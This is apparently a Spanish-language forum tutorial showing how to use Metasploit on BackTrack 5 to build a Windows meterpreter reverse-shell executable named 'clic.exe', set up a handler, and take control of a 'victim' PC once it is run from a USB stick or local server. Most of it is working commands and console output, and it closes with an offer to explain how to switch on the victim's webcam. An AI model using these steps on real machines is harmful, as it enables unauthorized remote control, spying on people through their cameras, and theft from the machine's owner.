Para esto necesitamos la herramienta BackTrack 5
1.) Abrimos una termina e iniciamos la sesión en metasploit framework y colocamos el payload que nos dará la sesión en meterpreter, nuestro ip y creamos el exploit con el nombre de click.exe,
root@bt:~# msfconsole
MMMMMMMMMMMMMMMMMMMMMMMMMMNMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMMM
MMMN$ vMMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmMMNMMMMMMN JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNR #MMMM MMMMMMM MMMM# dMMMM
MMMMNm ?MMNM MMMMN dMMMMM
MMMMMMN ´?MM MMMM NMMMMMM
MMMMMMNe ?NM MM? jMMMMMMMM
MMMMMMMMNm, eMMMMMMMMMM
MMMMMMMMMMNx MMMMMMMMMMMMM
MMMMMMMMMMMMMMMm+...+mMMMMMMMMMMMMMMMM
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]+ -- --
=[ 927 exploits - 499 auxiliary - 151 post+ -- --
=[ 251 payloads - 28 encoders - 8 nops
msf > msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 x > /root/Desktop/clic.exe
- exec: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 x > /root/Desktop/clic.exe
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options:
{"LHOST"=>"192.168.1.100", "LPORT"=>"4444"}
msf >
2.) Luego ponemos nuestra pc a que escuche el exploit con el payload que creamos, y nuestra dirección ip
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.100
lhost => 192.168.1.100
msf exploit(handler) >
3.) Iniciamos el exploit y esperamos a que la victima ejecute el exploit que ya fue pasado a su pc por un pendrive o lo bajo desde un servidor local
msf exploit(handler) > exploit
- Started reverse handler on 192.168.1.100:4444
- Starting the payload handler...
4.) Una vez la victima haya iniciando el exploit, nos cambiamos de proceso a Explorer.exe que en mi caso es el PID 1832. Para saber cual es el PID escriben "ps"
msf exploit(handler) > exploit
- Started reverse handler on 192.168.1.100:4444
- Starting the payload handler...
- Sending stage (752128 bytes) to 192.168.1.104
- Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.104:1171) at 2014-01-17 08:02:51 -0500
meterpreter > migrate 1832
- Migrating to 1832...
- Migration completed successfully.
meterpreter >
5.) Ahora la pc es nuestra, escribimos "help" podemos ver todas las cosas que podemos hacer.
si te interesa saber como encender una cámara web escríbeme un mensaje
PD: la M de Metasploit la hice yo XD